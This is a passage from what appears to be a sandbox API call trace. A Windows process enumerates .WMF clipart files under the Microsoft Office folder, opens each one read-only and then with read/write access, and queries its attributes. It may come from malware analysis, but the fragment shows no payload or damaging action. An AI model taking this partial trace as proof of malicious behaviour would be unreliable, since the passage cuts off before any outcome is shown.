InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.405] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0101.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.405] AreFileApisANSI () returned 1 [0101.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0101.405] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.405] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0101.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0101.405] AreFileApisANSI () returned 1 [0101.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0101.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 69 [0101.405] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04134_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.405] GetFileType (hFile=0x33c) returned 0x1 [0101.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0101.406] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.406] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.406] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.406] CloseHandle (hObject=0x33c) returned 1 [0101.406] AreFileApisANSI () returned 1 [0101.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0101.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 69 [0101.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04134_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.406] GetFileType (hFile=0x33c) returned 0x1 [0101.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0101.407] CloseHandle (hObject=0x33c) returned 1 [0101.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0101.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0101.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0101.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0101.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0101.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0101.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0101.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0101.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.408] AreFileApisANSI () returned 1 [0101.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0101.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 69 [0101.408] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04134_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc63b1c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd58)) returned 1 [0101.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0101.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0101.408] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.408] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.408] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc63b1c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa4c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN04174_.WMF", cAlternateFileName="")) returned 1 [0101.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0101.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0101.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0101.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0101.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0101.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0101.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0101.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0101.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0101.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0101.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0101.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0101.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0101.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.521] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.521] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.522] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0101.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.523] AreFileApisANSI () returned 1 [0101.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0101.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0101.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0101.524] AreFileApisANSI () returned 1 [0101.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a828 [0101.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 69 [0101.531] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04174_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.533] GetFileType (hFile=0x33c) returned 0x1 [0101.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0101.534] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.550] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.550] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.550] CloseHandle (hObject=0x33c) returned 1 [0101.550] AreFileApisANSI () returned 1 [0101.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0101.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 69 [0101.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.551] GetFileType (hFile=0x33c) returned 0x1 [0101.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0101.551] CloseHandle (hObject=0x33c) returned 1 [0101.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0101.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0101.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0101.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0101.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0101.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0101.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0101.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0101.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0101.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0101.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.552] AreFileApisANSI () returned 1 [0101.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a8c0 [0101.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 69 [0101.552] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04174_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc63b1c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa4c)) returned 1 [0101.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0101.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0101.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.553] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19ec, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN04191_.WMF", cAlternateFileName="")) returned 1 [0101.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.553] 